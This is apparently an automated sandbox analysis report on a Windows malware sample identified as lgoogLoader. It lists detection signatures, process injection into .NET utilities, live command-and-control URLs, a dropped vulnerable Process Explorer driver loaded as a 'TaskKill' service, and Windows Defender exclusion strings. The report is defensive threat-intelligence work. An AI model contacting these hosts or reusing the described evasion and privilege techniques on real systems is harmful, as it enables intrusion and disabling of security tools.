Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	882700
MD5:	daf761fb9aaa34a9c2120003694d88a3
SHA1:	47fd2695b6da26f6444799d442662b982d70f783
SHA256:	18d4850a10812f3b4d8631939d469b41c1d344a7fa9205acc31b265d0600291b
Tags:	NETexeLgoogLoaderMSILx64
Infos:

Detection

lgoogLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected UAC Bypass using CMSTP

Multi AV Scanner detection for submitted file

Yara detected lgoogLoader

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Writes to foreign memory regions

.NET source code references suspicious native API functions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Sample is not signed and drops a device driver

Machine Learning detection for sample

Injects a PE file into a foreign processes

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to launch a process as a different user

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Contains functionality to load drivers

PE file does not import any functions

Sample file is different than original file name gathered from version info

Enables driver privileges

Drops PE files

Creates driver files

Contains functionality to launch a program with higher privileges

Spawns drivers

Found evaded block containing many API calls

Creates or modifies windows services

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 6988 cmdline: C:\Users\user\Desktop\file.exe MD5: DAF761FB9AAA34A9C2120003694D88A3)

ComSvcConfig.exe (PID: 4572 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe MD5: 2778AE0EB674B74FF8028BF4E51F1DF5)

jsc.exe (PID: 3068 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe MD5: 2B40A449D6034F41771A460DADD53A60)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
LgoogLoader	LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.	No Attribution	https://blog.polyswarm.io/nullmixer-drops-multiple-malware-families	https://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\?????.sys	PUA_VULN_Driver_Sysinternalswwwsysinternalscom_procexpsys_ProcessExplorer_HoEP	Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 97e3a44ec4ae58c8cc38eefc613e950e.bin	Florian Roth	0x6765:$: 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 20 00 45 00 78 00 70 00 6C 00 6F 00 72 00 65 ... 0x66fd:$: 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 53 00 79 00 73 00 69 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 73 00 20 00 2D 00 20 00 77 00 77 00 77 00 2E ... 0x67b1:$: 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 31 00 36 00 2E 00 34 00 33 0x6911:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 36 00 2E 00 34 00 33 0x67dd:$: 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 70 00 72 00 6F 00 63 00 65 00 78 00 70 00 2E 00 73 00 79 00 73 0x68cd:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 20 00 45 00 78 00 70 00 6C 00 6F 00 72 00 65 00 72 0x688d:$: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 70 00 72 00 6F 00 63 00 65 00 78 00 70 00 2E 00 53 00 79 00 73 0x6815:$: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 4D 00 61 00 72 ...

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth (Nextron Systems)	0xade:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF 0x6546:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF
00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_lGoogLoader	Yara detected lgoogLoader	Joe Security
00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: file.exe PID: 6988	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 6988	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.1f6c773a2a8.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.file.exe.1f6c773a2a8.2.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x9d0d:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x9d3c:$e2: Add-MpPreference -ExclusionPath
0.2.file.exe.1f6c773a2a8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x9cdd:$r1: Classes\Folder\shell\open\command 0x912c:$k1: DelegateExecute

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 45%
Source: file.exe	Virustotal: Detection: 56%			Perma Link

Antivirus detection for URL or domain

Source: http://5.42.94.169/customer/368	Avira URL Cloud: Label: malware
Source: http://109.206.241.33/files/Hadi.config.CfgEncFileMZ	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://5.42.94.169	Virustotal: Detection: 7%			Perma Link
Source: http://5.42.94.169/customer/368	Virustotal: Detection: 8%			Perma Link

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Purala\source\repos\Particle-Filter\obj\x86\Debug\FastSLAM.pdb source: file.exe
Source:	Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, ?????.sys.0.dr

Source: global traffic

HTTP traffic detected: GET /customer/368 HTTP/1.1Host: 5.42.94.169Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 5.42.94.169 5.42.94.169

Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.94.169

Source: jsc.exe, 00000002.00000002.492997621.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.493023944.0000000000E66000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://109.206.241.33/files/Hadi.config.CfgEncFileMZ
Source: file.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.94.169
Source: file.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.94.169/customer/368
Source: file.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: jsc.exe	String found in binary or memory: http://www.sysinternals.com
Source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, ?????.sys.0.dr	String found in binary or memory: https://www.sysinternals.com0

Source: global traffic

HTTP traffic detected: GET /customer/368 HTTP/1.1Host: 5.42.94.169Connection: Keep-Alive

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen

Source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth (Nextron Systems), description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: C:\Users\user\AppData\Local\Temp\?????.sys, type: DROPPED	Matched rule: PUA_VULN_Driver_Sysinternalswwwsysinternalscom_procexpsys_ProcessExplorer_HoEP date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 97e3a44ec4ae58c8cc38eefc613e950e.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = 440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFC9CFAA577	0_2_00007FFC9CFAA577
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFC9CF90E58	0_2_00007FFC9CF90E58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFC9CFA1208	0_2_00007FFC9CFA1208
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFC9CF96A17	0_2_00007FFC9CF96A17
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFC9CFA3AF5	0_2_00007FFC9CFA3AF5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Code function: 2_2_00404AF0	2_2_00404AF0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Code function: 2_2_004084B7	2_2_004084B7

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

Code function: 2_2_00402050 _memset,_memset,_memset,_memset,_memset,__wcsicmp,__wcsicmp,__wcsicmp,SetEnvironmentVariableW,_memset,_wcscpy_s,_wcscat_s,CreateProcessW,GetLastError,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,_wcscpy_s,_memset,_memset,_memset,CreateProcessWithLogonW,GetLastError,EnumWindows,Sleep,Sleep,EnumWindows,CloseHandle,CloseHandle,CloseHandle,LoadIconW,LoadIconW,LoadIconW,LoadCursorW,RegisterClassExW,CreateDialogParamW,GetMessageW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetMessageW,LocalFree,

2_2_00402050

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FFC9CFA5870 NtLoadDriver,

0_2_00007FFC9CFA5870

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FFC9CFA5870 NtLoadDriver,

0_2_00007FFC9CFA5870

Source: file.exe

Static PE information: No import functions for PE file found

Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprocexp.SysB vs file.exe
Source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameShellRunasP vs file.exe
Source: file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameShellRunasP vs file.exe
Source: file.exe, 00000000.00000002.495389743.000001F6D7771000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRunpeX.Stub.Framework.exeL vs file.exe
Source: file.exe, 00000000.00000002.493612039.000001F6C5C50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRunpeX.Stub.Framework.exeL vs file.exe
Source: file.exe, 00000000.00000002.493115383.000001F6C58BA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameeroxipe4 vs file.exe
Source: file.exe, 00000000.00000002.493218018.000001F6C5AF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameeroxipe4 vs file.exe

Source: C:\Users\user\Desktop\file.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKill

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C

Source: file.exe	ReversingLabs: Detection: 45%
Source: file.exe	Virustotal: Detection: 56%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FFC9CFA58C4 AdjustTokenPrivileges,

0_2_00007FFC9CFA58C4

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to behavior

Source: ?????.sys.0.dr

Binary string: \DosDevices\PROCEXP152\ObjectTypes\\Device\PROCEXP152PsAcquireProcessExitSynchronizationPsReleaseProcessExitSynchronizationMmGetMaximumNonPagedPoolInBytesObGetObjectTypeMutantIoCreateDeviceSecureIoValidateDeviceIoControlAccessD:P

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@5/2@0/1

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

Code function: 2_2_004029C0 _memset,_memset,SHGetMalloc,SHGetDesktopFolder,SearchPathW,GetLastError,CoInitialize,CoCreateInstance,#217,#173,CoUninitialize,

2_2_004029C0

Source: C:\Users\user\Desktop\file.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: file.exe, ????????/?????????.cs

Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Purala\source\repos\Particle-Filter\obj\x86\Debug\FastSLAM.pdb source: file.exe
Source:	Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, ?????.sys.0.dr

Data Obfuscation

Yara detected lgoogLoader

Source: Yara match

File source: 00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001F6C58B8762 push rsp; retn 0009h	0_2_000001F6C58B8766
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FFC9CF967E9 push ebx; retf	0_2_00007FFC9CF967EA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Code function: 2_2_00404ACD push ecx; ret	2_2_00404AE0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

Code function: 2_2_00402CB0 _memset,_memset,_wcscpy_s,_wcscat_s,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetLastError,LoadLibraryW,GetProcAddress,_wcschr,_wcscpy_s,GetComputerNameW,CredUIParseUserNameW,CoTaskMemFree,

2_2_00402CB0

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TaskKill

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
